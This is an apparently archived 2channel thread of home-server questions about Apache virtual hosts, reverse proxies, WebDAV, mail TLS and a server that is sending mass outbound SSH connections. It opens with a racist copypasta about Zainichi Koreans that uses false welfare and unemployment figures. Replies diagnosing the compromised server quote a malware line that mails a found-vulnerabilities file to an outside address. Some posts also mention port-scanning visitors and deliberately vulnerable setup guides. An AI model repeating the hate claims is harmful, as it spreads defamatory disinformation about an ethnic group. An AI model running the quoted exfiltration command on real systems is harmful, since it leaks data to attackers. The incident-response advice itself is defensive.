DNS未登録さん :2010/05/31(月) 17:09:47 ID:L7BcpHgJ
在日朝鮮人の生活保護の実態 〜働かず年600万円で優雅な生活〜
在日の40%の生活保護者所帯への援助は年間平均一所帯600万円。
年計2兆3千億円が「在日朝鮮人の生活保護費」になっている。
≪都市部の30代母親と小学生子供2人の生活保護費の内訳≫
生活費として月に『15万円』
母子家庭なら母子加算と呼ばれる追加支給が月に『2万3千円』
教育費として給食費・教材費など『7千円』
住宅費は上限が決まっているが『5万円』全額支給される。
これだけで合計月に『23万円』
国民年金全額免除。上下水道基本料金免除。NHK受信料全額免除。
医療費は保険診療内なら全額免除。通院費も認められれば全額支給。
都営交通無料乗車券。JRの定期券割引。
年金は支払い免除のうえ“掛け金無しで”年金受給が可能である。
他にも名目を変え様々な給付や免除がある。
民潭の統計では在日朝鮮人約64万人中、約46万人が『無職』という。
つまり4分の3が無職である。 在日は「特権は存在しない」というが、
民潭が自ら「46万人が無職」と公言しているのである。
無職がどのように飯を食っているか考えればそんな嘘は通じない。
http://www.koreanantijapan.comze.com/index.html
>>307 えっ…
今確認してみたですが、
10.4なら一点ありますけど
10.5が見当たりませんのですが…
先に定番ガイド本の10.4版を買ったのですが、
10.5版の目次と比較してみても、
やはりwikiは10.5からのようなんです
しかしどこにも売ってない…orz
OSXのバージョンに依存して動いたり動かなくなったりするwikiなんて聞いたことねえな。 仮にそんなもんがほんとにあったとしても、たったそれだけの違いで 動いたり動かなかったりするようなアホな作りのものは無視しておけ。 世の中ではlinuxでもwindowsでも同じように動くようなものばかりだというのに。
>>311 ではたとえば、
10.4でとりあえず鯖構築して、
wikiについてはどうにかこうにか自分でやってみる、とかですか…?
>>312 それ、OSでして、serverソフトではないです…
ああなるほど 米国にあるけど買うの大変かなあ
しかしどのwikiなんだろう それでしか動かないなんて、OSXserverに標準で付属してるの?
>>316 一連のコンポーネントに組み入れられていて、
要は簡単なインターフェイスでいじれる、ということです…
プログラミング云々はまったくの素人なので
wikiサーバをいちから構築するのはどだい無理です…
>>315 インターナショナル版なら、そして安ければ
米国アマゾンのアカウントは持ってますです…
自己レスです… 値段見てきましたがビミョーですね… 日本で中古市場ならたぶん1万円台で買えるのでは、と
netbsd/macppc でもいれとけ。
321 :
DNS未登録さん :2010/05/31(月) 21:02:49 ID:GRwOnPpz
メールの暗号化でTLSってのがありますが、.crtファイルを作ったりpostfixの設定ファイルを修正したり ポートも開けたもののメーラから送受信することができません。 証明書を選択&設定しなきゃいけないみたいですが、その証明書というのはどれを使ったらいいんでしょうか? ググッて調べたんですが、自宅サーバの場合での例が出てこなくてまいってます、アドバイスお願いします
普通に単一ドメインの証明書で大丈夫だよ。 https で使っているならそれでOK。 証明書新たに取得する場合も一番安い数千円ので足りる。
宅鯖で自分用にオンラインストレージサービス立ち上げたい場合のお勧めって なんでしょうか。とりあえずWebDavは無しの方向で。 Dropboxは超絶便利なんだけど、やっぱシークレットなファイルを置く気には なれないんで。
>>325 自分用の宅鯖ならSSHオヌヌメ
まぁ、DropboxとTrueCrypt組み合わせた方がセキュアで楽チンだけどな
ある人がBBSを開設したからおいでとコミュニティに書き込んでるんだけど、 これが自宅鯖であるかを確認することはできますか?
・IPアドレス逆引き ・回線事業者から判断 海外だと特定は難しいかもね。
>>328 逆引きすればある程度は
何のコミュか知らんが、ある人が何かでパクられたらお前も事情聴取な
>>329-330 逆引きというのを調べてみます。
なぜ事情聴取されてしまうのかわからないのですが、
逆引きというのが犯罪行為なのでしょうか?
ちなみにBBSに集まるのがコミュの人間だけだった場合、
解析ツールで個人を特定できてしまうほどの情報が集まるのでしょうか?
>>332 私は入らないのですが、コミュの不特定多数が閲覧しそうです。
逆に解析ツールを設置しているかは判断できませんでしょうか?
何を心配してるのかわからんが、自宅鯖だろうがレン鯖だろうが アクセスログからの解析は可能だよ。閲覧した時点でログは残る。
>>334 ありがとうございます。
小さなコミュでは情報収集を目的に管理者やる人もいるよな、と思いまして。
第三者の匿名掲示板があるのにわざわざ別サイト作ったりして。
普通は何かしら現行のものに不満があるから、とかいうマトモな理由が出てきそうなものだが いきなり悪意がある前提で話が進むあたりロクなコミュじゃないんだろうな。
>>336 新コミュを立てた人は旧コミュに直接意見を書かずに
自サイトで旧コミュについて愚痴っているようです。
旧コミュは第三者が管理人をしていますが、
新コミュはその人が管理をしています。
PCに詳しくない人が多いので何も知らずに解析されたり、
書き込みを改竄されてはと心配です。
ちなみに匿名の町内会コミュでの話です。
>>337 お前は単に「そこにいかなくて済む理由」が欲しいだけじゃねえのそれ
なんか気持ち悪いな
正直自宅鯖がどうとか言うよりコミュ運営の問題であり心の底からどうでもいい話
このドライなネット世界でそんなドロドロした活動をすることもあるまいて。
なるほど、たしかに皆さんの仰るとおりです。 レス頂けて助かりました。ありがとう。
宅鯖に掲示板立てて、アクセスして来たやつのlPアドレスをログから 抜き出してポートスキャン。っつー痛い管理人なら見たことある。
痛いというかえらく回りくどいことしてんな
「自宅サーバーの立て方」みたいなページ作ってわざと脆弱性のある方法を掲載してアクセスしてきたやつを〜 とかありかもしれんな。
犯罪者として捕まりたいならありかも知れんね。 脆弱性のあるWebページを作るという下準備をしてる時点で故意犯確定だし。
最近は宅鯖のくだらない質問じゃなくて、本当に下らない質問が多いね。 技術や知識が未熟云々以前の質問。
>>347 日本語理解できてる?
誰も見る見ないの話はしてないんだが。
くだらないしつもんがおおいなw ↓ じゃあかかわらなければいいんじゃない?
>>348 スルーしろって言われてんだと思うけどな
俺も同感
>>348 気に入らないなら、他の何かに打ち込んだ方が合理的。
自分の思い通りになる世界なんて無いんだから、今の世界でより良く生きることを考えなさい。
くだらないレス・・・・いや、なんでもない
>>352 じゃあくだらんレスなんぞ付けずに黙ってろよ。
354 :
352 :2010/06/06(日) 21:20:11 ID:???
なら、お前も俺なんぞに反応するなよ。説得力ないぞ。
355 :
DNS未登録さん :2010/06/06(日) 21:23:40 ID:1BLcQO8E
うるせええよwwwwwこのクズ野郎wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
うむ、正にこれこそがしょうもないレスの流れだな。
おまえもだろ。なにいってんだ?鏡をみたことある?
そんなに話をループさせたいのか?
359 :
DNS未登録さん :2010/06/07(月) 17:50:38 ID:Ch3AE20t
輝け甲子園の星(2010早春号)より 選抜高校野球選手権大会出場選手「好きなタレント」アンケート 1位 北川景子 49票 2位 上戸 彩 24票 3位 香里奈 23票 4位 佐々木希 22票 5位 松本人志 18票 6位 新垣結衣 17票 7位 南 明奈 黒木メイサ 15票 9位 木下優樹奈 12票 10位 市川由衣 11票 11位 EXILE 10票 12位 ダウンタウン 相武紗季 9票 14位 宮崎あおい 8票 15位 柴咲コウ 戸田恵梨香 井上真央 コトリッチ 7票
360 :
DNS未登録さん :2010/06/07(月) 19:26:24 ID:mkbtm2bZ
は?うっせえよwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
目指すのは安定 通信の糸 たった五日で鯖主に さようなら顧客(クライアント) 鯖と自作機 アドミニストレータ一年生 消えたアカウント 機器の状況 私、仕事辞めます こんにちは刑事さん デーモン君をやっつけろ
362 :
DNS未登録さん :2010/06/09(水) 00:08:04 ID:KA8yR8SU
15年くらい前にテレビによく出てたと思うんだが、名前が思い出せない。 髪型はブルーハーツの右側にいる、頭に布巻いてるみたいなやつの髪型 カサカサで逆立ててたと思う 女で声は低めでうるさい わかるだろ いいたいことは 頼む 規制で書き込めないんで 力を貸してくれ
そんな鯖あったっけ? さすがに15年前に自宅鯖ってそう無いんじゃないかな
1995年か。ダイアルアップの割れ鯖がいいところだと思う。
OCNエコノミーも1996年からだしな 知り合いが早速自宅鯖立ち上げてたっけ
そもそもその:1234を:80でlistenすりゃいい話じゃないの? 普通は何かしら設定できるものだけど。
>>366 2つのURLのドメイン名が同じ、が条件なら、フレーム使って胡麻化すとか。
(80側にフレームだけ作って、1234側に実コンテンツを置く)
mod_proxy使っても、結局80側のURLを間借りしないといけないわけだし。
できるかできないかだけ教えてください。 現状win7+Apache+dice+moreFTP
途中書き込みしてしまいました。 できるかできないかだけ教えてください。 現状win7+Apache+dice+moreFTPをdyndns使って運用しています。 で、FTPフォルダは鯖PC内蔵のHDDのフォルダを指定しています。 これに更にLAN接続のHDDを追加して外部から同じFTP鯖とすることは 可能ですか?
>>372 できない。
>鯖PC内蔵のHDDのフォルダを指定
これを諦めてよくて、なおかつFTPは外へのデータ送出だけでよいなら
apacheのmod_proxyを有効化して逆プロキシとしても動かせばできるかもしれない。
fuseと思ったが窓か
377 :
366 :2010/06/10(木) 00:41:31 ID:???
みなさんレスありがとうございます。
>>367 さん
スクリプト側で1234としているところを80にすると言うことでしょうか?
既に起動しているanhttpdとぶつかってしまいました。
違ったらすみません。
>>368 さん
2つのURLのドメインは同じです。
http://hoge.com/index.htmがあり 、それとは別にスクリプトにアクセスするのに
http://hoge.com:1234を使う形になっています 。
フレームとは何でしょうか?ググってみたけどもう一つよく分かりませんでした。
何かヒントになるワードを頂けるとググりやすいのですが…
>>371 さん
anhttpdのバーチャルホスト機能を使う方法でしょうか?
使用している無料のDNSでは設定が出来ませんでした。
最悪DNS乗り換えも視野に入れて検討したいと思います。
フレームってHTMLのframeタグでしょ。 URL隠蔽に使うのはバッドノウハウだと思うがw
状況がよく分からんがport1234には外部からアクセス出来るのか? 出来るならLocationヘッダか何かでリダイレクトすればいいんでないの
>>377 実態は内部ネットワークにあるanhttpdでやって
外に見せるのはapacheのmod_proxyでもsquidでもdelegateでもつかって
リバースプロキシすればいいんじゃね
機械(か仮想マシン)がもう一台いるけどさ
anhttpdは別のものを運用してるのか。 じゃあIPアドレス2つ持たせるかdelegateとかのリバースプロクシ挟まないと無理だな。
>>377 >>371 氏が書いているようにバーチャルホストで良い。
anhttpdがすでに動いているなら、それにバーチャルホストを設定する。
使用しているDNSで設定が出来ないなら同じ所からもう1つドメインを取れば良い。
あなたの技量でproxyはやめておきなさい。
プロキシは設定を間違えると踏み台などの事故に繋がりやすい。
dream weverみたいなウェブ管理ソフトでFTP接続して、 .htmlを開いたとき、.htmlの相対パスがそのソフトウェアのブラウザでは上手く機能しない のですが、これって設定かなにかいじって直せるものなんでしょうか?
高い金出してたんならadobeに聞けよ
金出してないから2chで聞いてるんだろが!
dream weverみたいなソフトじゃadobeに聞いちゃダメだろ
どんなソフトでも聞く権利はある つーか、そのためのサポートだし
Dreamweverなのかそうでないのか。
389 :
366 :2010/06/11(金) 07:49:45 ID:???
>>382 さん
レスありがとうございます。
バーチャルホストの設定でやってみようともう一度調べたのですが
この機能ってaaa.hoge.comに来た奴をD:\siteAに、
bbb.hoge.comに来た奴をD:\siteBに投げるだけですよね?
他にやり方があったりするんでしょうか。
ちなみに、昨晩Delegateと格闘してみましたが、やっぱり設定がよく解りませんでした。
anhttpdを8000番ポートで、Delegateを80番ポートで動かしてみたんですが
hoge.comへのアクセスは上手くいったもののhoge.com/diaryとか
hoge.com/bbsみたいな下位のディレクトリにアクセスしても
hoge.comに置いてあるページが表示されてしまいます。
dream weaverじゃなくてaptana studioっての使ってます
>>389 delegateは素人がうっかり手を出せるもんじゃないよ。
rewriteやlocationで飛ばすとかすれば?
鯖のファイル構成での相対パスで画像等を指定して欲しいのですが そうなりません。絶対パスだと不便なだけな気がするんですが。
そんなことはありませんよ。 絶対で指定しておけばどの階層にあっても参照できますし。 で、主語が無いので判断しかねるのですが「相対で指定して欲しい」は 何に対しての話をしてます?
>>389 hoge.comとhoge.com:1234が別プロセスだとか違うHTTPサーバソフトだとかの
構成なら、名前ベースバーチャルホストは直接的な解決にはならない。
>>380 の提案とほぼ同じだけど、
Apache → ポート80 / anhttpd:80 → ポート81 / anhttpd:1234 → ポート1234
のようにポート割当して、Apacheのmod_proxyで2つのanhttpdをくっつけるのが
一番楽だと思う。
あと
>>391 も書いてる通り、delegate使うよりApacheの方が多分簡単。
htmlファイルの中に、../images/hoge.png みたいに書いたのをプレビューすると正しく映らないという意味です。 相対パスで表示して欲しいのですが
ブラウザで見りゃいいじゃん 鯖の問題じゃないし、ここで聞くのが間違い
>>395 つか何の話してるんだ? ソフトウェア?
続いてる話なら名前にレス番でも書いとけ。
398 :
366 :2010/06/11(金) 22:44:42 ID:???
ありがとうございます。
>>378-380 さん辺りにレスしたハズなんだけど書き込みが反映されてない…
>>394 さん
今日諦めて(?)anhttpdをApacheに入れ替えました。
mod_proxyの設定も行い、hoge.com/hugaでhoge.com:1234にアクセスすることは成功しました。
しかし、例えばhoge.com/huga/aa.cgiからhoge.com/huga/aa.cgi?mode=1とかにアクセスすると
hoge.com/aa.cgi?mode=1に飛んでしまい、NotFoundになってしまいます。
恐らく設定が足りてないと思うんでsが、何かヒントを頂けると幸いです。
http.confのmod_proxyに関する設定は以下の通りです。
<IfModule mod_proxy.c>
ProxyRequests Off
ProxyPass /hoge/
http://127.0.0.1:1234/ ProxyPassReverse /
http://127.0.0.1:1234/hoge </IfModule>
hogeとhugaがごっちゃでわからんわ、このホゲ!
>>398 mod_proxy以外にmod_rewriteが必要な領域になっているような気がする
>>398 いろんな人が貴方の力量ではmod_proxyなどやるべきでは無いと書かれているのを無視するのかな。
やりたい事もう少し伝えてはどうか。
つまり1234ポートの先はなに?
どうもproxyもバーチャルホストも必要くRedirect permanentなんかでできそうな気がするが違うのかな。
proxyを使うのは最終手段と考えた方が良い。
例えば Redirect permanent /huge/
http://hoge.com:1234/ proxyが必要な場合と言うのは、LAN内の2台以上のサーバーうを同じポートで
アクセスさせたい場合なのだが。
で、2台のサーバーを使いたいのですか?
402 :
366 :2010/06/12(土) 09:35:58 ID:???
403 :
age :2010/06/12(土) 09:48:48 ID:JlRzNVk3
netstatを実行すると tcp 0 1 192.168.255.10:46624 ***.***.***.***:ssh SYN_SENT tcp 0 1 192.168.255.10:52275 ***.***.***.***:ssh SYN_SENT がすごくたくさん表示されます。 すべて接続先のportが22です。 これは何でしょうか。
>>403 ssh sftp scp ポートフォワード
ageんな。
405 :
sage :2010/06/12(土) 10:12:53 ID:JlRzNVk3
いろんな所からすごく大量にきていますが、 大丈夫でしょうか。
406 :
DNS未登録さん :2010/06/12(土) 10:16:09 ID:HPlFqlzn
>>403 来てる・・・?送ってるぞそれ。
rootkitのヨカーーーーーン!
>>405 送りつけて相手の反応を待ってる状態なんだが
なんか感染してねえか?
そのローカルアドレス持ってるマシンとっとと切れ
409 :
sage :2010/06/12(土) 10:22:11 ID:JlRzNVk3
しかけてるポートすべてiptablesでブロックしてるから、 大丈夫だが、うざい。 source port22はじけばいいか?
だめだこいつ、理解してねえ
412 :
sage :2010/06/12(土) 10:26:31 ID:JlRzNVk3
そんなこと言わずに。おしえてくださいよ〜
>>413 ネタでないならおまえが思ってる120倍位事態は深刻。
416 :
sage :2010/06/12(土) 10:29:55 ID:JlRzNVk3
やばさが、全然わからない。 やばいと実感できる、確認方法を教えてくれ。
家に帰ったら知らないおっさんがいて、固定電話でオレオレ詐欺電話かけまくってる。
>>409 外部から自鯖にログインしてる状態の例は、こんな感じ。
Proto 受信-Q 送信-Q 内部アドレス 外部アドレス 状態
tcp 0 0 192.168.255.10:22 ***.***.***.***:52275 ESTABLISHED
>>403 の出力とはポート番号の表示が逆になってるよね。
つまり
>>403 の出力が意味する所は、他の人も書いてる通り、
自鯖(192.168.255.10)から外部(***.***.***.***)に
ものすごい勢いでssh接続を試みているわけ。
SYN_SENTなのは相手側がポート22での接続を受け付けてないからかな。
自分でそういうことしてる心当りがなければ、何らかの方法で侵入されて、
外部へのアタックに悪用されてる可能性があるってこと。
だから、調べるにせよ一から再構築するにせよ、
とりあえずまずはネットワークから切断した方がいい。
その場合そのおっさんは見えないし痕跡も殆どない、何故か吸わない煙草の吸殻が残ってた、みたいな 気がついたら数十万の通話料請求と、知らぬ間に犯罪行為(数百万クラス)の片棒かついだ形、ってとこか ネタでないとしたら、iptablesでのブロックなんかもう信用できねえな ブロックしてる振りさせてる可能性が高くなっちまうし、ログもあてにならなくなる こうなるとそのnetstatですらあてにならない
ここまで書かれておいて、実はLAN内部からの正常な接続でした なんてオチをちょっと期待する
全くわからねぇ 誰か教えて下さいよ〜
とりあえず簡単な解決法としては、鯖を回線から切り離して フォーマット&再インストール&回線繋がずに使用
>>421 そのメールアドレスでググると興味深いな。
もう元のページがないのでGoogleのキャッシュをコピペするけど
cat vuln.txt |/usr/sbin/sendmail
[email protected] . Interestingly, a similar command to send the file vuln.txt to a different hardcoded email address is included at regular intervals in the shell script itself
侵入されて埋め込まれたスクリプトで脆弱性を探して
定期的にそのメールアドレスに送信してるのかな。
まあ100%アウトな状態なので、まずは回線切ろうよ。
で、データのバックアップとって、一から再構築し直した方がいいよ。
メールアドレスを調べたところ、そのメールアカウントはないみたいです。 いい勉強と思っているので、これを機にできるだけ調べてみたいと思う。 この状態で、感染経路を調べる方法はありますでしょうか。 あけているポートはhttp,https,ssh,smtp,popぐらいです。 selinuxは使用していません。 httpdはヴァーチャルホストで10サイトぐらい公開しています。
切れんのです。
>>430 お前の鯖は宮崎の牛と同じ。
しのご言わずにさっさと殺せ。
自分のずさんなセキュリティ対策を呪え。
いい例えだ!
しかし、少しでも手がかりを知りたい。 いま、"vuln.txt"を検索かけてるよ。
本来なら今すぐ回線切ってくれた方がいいんだけど、止められないとのことなので、 root乗っ取られてない前提で。 netstat -npとかすると、外部にアタックかけてるプロセスが見付かるかも しれないので、見付かったらプログラム保存してプロセス殺す。 (多分、広く出回ってる出来合いのスクリプト群だとは思うけど) また、とにかく一台PC調達してきてOS等インストール、環境構築、 そちらに環境移して、感染鯖は回線切断。これならダウンタイム最小で済むでしょ。 感染経路とかの調査はそれから。
外にアタックしてるのはもう間違いないでしょ、成否はともかく しかもその上どうしても片棒担ぎたいらしいし、botネットにも協力したいらしいしなぁ 通報してあげるからドメイン晒してよ、そうすりゃ嫌でも止めることになる
netstat -npしたところ気になったプロセスは見当たりませんでした。 優秀なrootkitだったら、通常コマンド群も信用できんけど。 pam弄って、suできなくしているのでrootは乗っ取られてないと思うけど、 なんともわからない。
>>438 そういうのは大抵世界全国にSSHブルートフォースかけてるだろうから、
一部の管理者がおまいのISPに苦情のメール送ってるはず。
で、ISPから苦情がきて強制的に回線切断の措置をかけるだろうからそのうち切断されるよ。
これ以上迷惑をかける前に鯖をLANケーブルから引っこ抜け。話はそれからだ。
どうしてもというなら過去24時間にsshブルートフォースしてきた国内のIPアドレスをゴルァしときますか。
海外からだと見過ごされがちだが、国内からだと対応が早いぜ。
netstat、ps、lsofとか大抵のツールは改ざんされてるだろうからあまり意味はない。
historyファイルもunsetされてるだろうからコマンドの追跡も不可能。
外部へのsshブルートフォースを試みるのが定番の動作だが、
一般ユーザーではできる事が限られるので、
脆弱性があるソフトウェアをダウンロードしてrootへ昇格することが多い。
Privilege Escalationとかで調べるといいかと思うが、
自力で対策方法を考えられないレベルならとっとと中身を消してしまうのが無難かね。
明らかに手遅れなんだから原因探る前に被害拡大の阻止を進めてほしいんだけどなぁ
原因はどうみても管理者のスペック
隔離してやったぜ。 で、どうすればいい?
>>442 初動に問題があったと言わざるを得ない。
鯖だけじゃなくて管理者の頭もクラックされてるな。
むしろ事の重大性を理解してないというか 初動のトロさは赤松大臣そっくりだな
物凄く問題はあったが、それでも隔離しただけマシだ
>>448 養護するつもりはない、ただ以前ここに現れた同類のバカは結局隔離もしなかったからな
そのまま消えてった
養ってどうする、擁護だった
隔離したら、チェックしていますが、とくに変化はありません。 何だったのだろう。 リブートしたら、以前と変わらない感じ。
どうせ調べるだけ無駄だからさっさと再インストールしとけ どこが汚染されているか調べるのが不可能に近いんだから
ある程度、把握しとかないと 同じ構築方法じゃ また再発するだろ。
>>452 rootkitの怖さってのはまさにそこだよな
455 :
DNS未登録さん :2010/06/13(日) 05:34:47 ID:2PR4aO4k
隔離しか言えない連中はスペック的に同様
>>455 掲示板越しの人間にウイルスバスターの全ドライブスキャンの相当の行為をしてもらわんといかん。
つまり、鯖オーナのスペックが計算尺程度しかない現状では殺処分が適当。
その他のパターンでもコストとインテグリティの面で同様。
通常のデータは白なのでバックアップ。
WWWに関わるデータと用途に関わらず持ってくスクリプトはすべて内容確認。
その他の実行可能ファイルは持っていかない。
>>456 計算尺にあやまれ!
あれは三角関数から対数まで、瞬時に計算できる優れ物だ
使い方はもう忘れたけどな
>>457 うお!そんなん出来るんか。正直なめてた。すまん。
じゃあ算数セットに入ってた計算おはじきだ、これでどうだ。
ここのスレにrootkit仕込まれた人、どの位いるんだ?
どのくらい、rootkitに対処できる人がいるんだ? そして、隔離以外の対処方法を教えてほしい。
>>461 隔離は応急処置。
さっさと再インストールしなされ。
すでに再インストール済み。同様な構築方法ではまた突破されるが。
侵入経路はネットワーク経由か管理者がハマったトロイの2種類だろう。 Linuxではオープンソースの自浄作用がハタラクから後者は余り考えられない。 ので、ファイアウォールちゃんと構築してんのかと。 てかLinuxなんかOSって? そもそもその情報すら出してないよなおまえ?馬鹿なの?死ぬの?
>>463 侵入される前に対策ソフトを入れるのが原則
進入された後じゃログもコマンドも信用できないから調べようがない
侵入される前に対策ソフトを入れるのが原則(キリッAA
467 :
DNS未登録さん :2010/06/13(日) 22:11:14 ID:Uxkrwoxn
お取り込み中のところすいません。 アパッチでのバーチャルホストの質問なんですが、 www.AAAA.netにアクセスは問題ないんですが、 BBBB.comにアクセスすると/var/www/html/VHost/AAAの内容が表示されます、 もしかして自鯖でDNSサーバー動かす必要あるんですか? 自鯖暦3日目です、助けてください。 ちなみにOSはFedora12 ムームードメインのカスタムDNS設定 AAAA.net サブドメイン www レコードA IP xx.xx.xx.xx(自分の固定グローバールIP) BBBB.com サブドメインなし レコードA IP xx.xx.xx.xx(自分の固定グローバールIP) ルーターでxx.xx.xx.xx:80をローカル鯖IP192.168.1.100へ変換 httpd.confのVirtualHost設定中身 <VirtualHost *> DocumentRoot /var/www/html/VHost/AAA ServerName www.AAAA.net </VirtualHost> <VirtualHost *> DocumentRoot /var/www/html/VHost/BBBB ServerName BBBB.com </VirtualHost>
>>467 その直前にNameVirtualHost *:80は当然あるよね?
apachectl -S で確かめろ。
返信ありがとうございます、
>>468 あります 質問に書きもれてました
>>469 こんなんでましたけど?
[root@俺 ~]# apachectl -S
[Sun Jun 13 22:41:02 2010] [warn] module php5_module is already loaded, skipping
httpd: Could not reliably determine the server's fully qualified domain name, using 自分のドメインC? for ServerName
[Sun Jun 13 22:41:02 2010] [warn] NameVirtualHost *:80 has no VirtualHosts
VirtualHost configuration:
wildcard NameVirtualHosts and _default_ servers:
_default_:443 自分のドメインC? (/etc/httpd/conf.d/ssl.conf:75)
*:* www自分のドメインA (/etc/httpd/conf/httpd.conf:1003)
*:* 自分のドメインB (/etc/httpd/conf/httpd.conf:1012)
Syntax OK
471 :
467 :2010/06/13(日) 22:57:46 ID:???
うむむむ httpd: Could not reliably determine the server's fully qualified domain name, using 自分のドメインC? for ServerName が怪しい気がする、ちっと調べてきます。
472 :
467 :2010/06/13(日) 23:13:41 ID:???
自分のドメインC?はOSインストール時に設定するホスト名でした でもどう関係あるんだ?
defaultがssl.confっておかしいだろ。 名前がちゃんと引けているか? dig @dns www.AAAA.net の結果は?
>>465 対策ソフトとはselinux、Tripwireとかsnortですか?
おすすめはなんですか?
>>474 役に立ちそうなの片っ端から入れていけば?
476 :
467 :2010/06/14(月) 00:45:37 ID:???
apache入れなおして webminでバーチャルホスト設定入れなおしてみました
でも結果は一緒っぽい
>>473 dig: couldn't get address for 'dns': not found
引けてないかね?
477 :
467 :2010/06/14(月) 01:30:13 ID:???
ヤッター正常に機能したよ NameVirtualHost *:80 を NameVirtualHost * に書き換えたらうまくいった。 ありがとうございました。 でもなんで?
>>476 dnsの部分はdnsサーバのアドレス。
479 :
DNS未登録さん :2010/06/14(月) 15:49:46 ID:6eqwCq6D
てすと
Linux機で動いているApache2(WebDAV)にWin7pro64のネットワークフォルダのショートカットからアクセスした時の動作で質問。長いです。
現象(概要)
フォルダをダブルクリックしてすぐに開ける時と、開けない時がある。
開けない時はエクスプローラが固まってからエラーがでる。エラーコード0x80070035(ネットワークパス見つかりません)。
でも、もう一度ダブルクリックすると開ける。
詳細
すぐ開ける時とすぐ開けない時の違い。パケットキャプチャ。
1,TCPの3wayハンドシェイクが確立
2,クライアントからOPTIONS / HTTP/1.1のリクエストを送る。
3,サーバから2へのACKが帰ってくる。
4,サーバからHTTP/1.1 200 OKのリプライを送ってくる。
ここまではどちらも同じ。こっからが違う。
すぐ開ける時
5,クライアントからPROPFIND /desktop.ini HTTP/1.1 を送る。
チョイ略(404が帰ってきたりして、リトライしてる?)
6.最終的にクライアントからPROPFIND / HTTP/1.1 を送る。
7サーバからリプライが返ってくる。→開ける
開けない時
5.クライアントから4へのAckを送る。
6.サーバからFYN,ACKがかえってくる。
7,クライアントから重複(Duplicate)ACK(5と同じシーケンス、応答確認番号)を送る。
8,6と7を約60秒(計7回)繰り返す。
9,クライアントからACK,RSTを送る。
10,新しいTCPセッションを生成して、開ける時の5-7が行われています。
4へのDuplicateACKの送信は開けない時には必ず発生しています。
現象終わり。
質問です。二つ。
1.TCP的には4のデータをうけとってから、開けない時の5-6までは正常な気がするんですが、なぜクライアントがDuplicateACKを返すのでしょうか?
(TCPって送るデータがなかったら、FYN,ACK立てて返しますよね。。)
2.開ける時はACKを返さずに4の後にいきなりPROPFINDを送ってるのですが、この辺の動作って何を調べたらわかりますか?
これって正しい動作なんでしょうか。。
正直お手上げ状態です。。
ネットワークドライブの追加はコンピューターからネットワークの場所を追加する→
http://host.mydomain/で登録しました 。
パケットキャプチャのスクショ置いておきます。
http://viploader.net/desktop/src/vldesk002157.png
481 :
DNS未登録さん :2010/06/14(月) 17:03:42 ID:o4rbfSBh
足りない情報、質問何でも言ってください。
WebDavのURLってSSLではないとだめなんじゃないの?
483 :
480 :2010/06/14(月) 17:31:12 ID:???
>>482 SSLはモジュールも設定もいれてないので必要ないはず・・・・です。
>>484 エラー内容的には同じなんですけど、どうなんでしょう。
仮にセキュリティ上SSLが必要になってるとしたら、有効になってないにもかかわらず繋げてしまうのは変なので
違うような気がします。
486 :
480 :2010/06/14(月) 17:58:07 ID:???
追加ですいません。 /var/log/apache2/error.logにはエラーはでてないです。
>>480 私の場合はXPなのであくまで参考ですが、そもそも素のWindowsでWebDAVを
使うのはあんまり期待しないほうが良いようです。
専用クライアントを入れてしまうのが、多分解決方法としては時間的に最も早い
のではないかと思います…。ちなみに当方はCarotDAVを使用。
OPTIONSへのサーバの応答が返ってきてんのに何をまってるんだろ。。
クラ「使えるオプションおせーて」
鯖「どぞー(´ー`)ノ○」
クラ「受け取った」
鯖「これで全部だよー」
クラ「もっかいおくって。」
鯖「え?」
クラ「はやく。」
鯖「いや、さっきおくっ クラ「うるさいはやく」
60秒後・・・・・・
クラ「もういいよ!あっちいけ」
クラ「・・・・propfind」ボソ・・
こんな感じ?
切断してる60秒は
HKLM\SYSTEM\CurrentControlSet\Services\WebClient\ParametersのSendReceiveTimeoutInSecな気がする。
http://technet.microsoft.com/ja-jp/library/ee155455.aspx#EDA ただサーバからはOPTIONSに対して以下の応答ちゃんと返してるんですよね。
200 OK Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK
Microsoft-WebDAV-MiniRedirが受け取れてなかったらこういう動作になったりするんだろうか。
この辺の仕様がわからないです。
いきなりpropfiind送ってくれるようにできないのかな。と思って
>>487 CarrotDAV試してみたら、送ってくれますね。
>私の場合はXPなのであくまで参考ですが、そもそも素のWindowsでWebDAVを
>使うのはあんまり期待しないほうが良いようです。
何がわからんって動作に関するドキュメントが見つからないのがきついです。
>>480 エクスプローラに登録するURLの最後に「?」だったか何かを付けると安定する
事があった気がする、よく覚えてない
関係なかったらゴメン
>>490 激安鯖買ってメモリだけ4GBくらい増設。そして64bitOSを入れる。
いまからなら32bitOSは考えなくていい。
12,980円のが良いですね。 こんなに安いとは。でも売り切れ… 1万以下を狙っているのですが、あまり期待しない方が良いでしょうか。
偶に安売りで1万円切る時もある。 急がなければ決算期まで気長に粘ってみるのも良いかも。
レスどうもです。 家によくわからない電源とHDDがあったんでマザボだけ買って自作しようかなと思ってます。 火事が心配ですが。 鯖の用途はPHPなどを動かすぐらいですけど、32bitではいけないのですかね。 極力安価に済ませたいので…
ubuntuのサーバー版って触ったこと無いけど、X入ってるんかな? X入れるんなら、P3クラスは辛いと思うけど。 PHPもCPU食うよ
ラックに収める様な鯖ってファンがうるさくて部屋に置けないかもしれないよ。
>>495 Windows機が手元にある場合の、ハードウェア購入費用ゼロ作戦。
PHP使うだけが目的なら、WindowsにPHPとApache httpdとか入れてしまう手もある。
Linux上で、というのも目的になるなら、coLinuxを試すとか、
VirtualBoxみたいな仮想化環境を使うのも手かもしれない。
格安鯖はWikiによく情報がまとまってるので、それも見てみた方がいいかな。
Win環境に仮想マシン立てるのは、再起動の度に起動しなおすのが面倒で結局使わなくなるw 練習で使うだけならジャンク部品組み合わせたような貧弱鯖でも問題なし。 本格運用ならスペック高めのに仮想マシンで構築した方が楽。
皆さんレスありがとうございます。 鯖立てるのはLinuxの勉強と、暇つぶしみたいなものです。 あと、WinでVMplayer使ってLinuxプログラミングはしていますが、Linux専用機が欲しかったもので。 一番心配なのはApacheなどの設定ですが…。 取り敢えず最初は自作で頑張ってみます。
501 :
DNS未登録さん :2010/06/21(月) 11:46:26 ID:j2SAOh3O
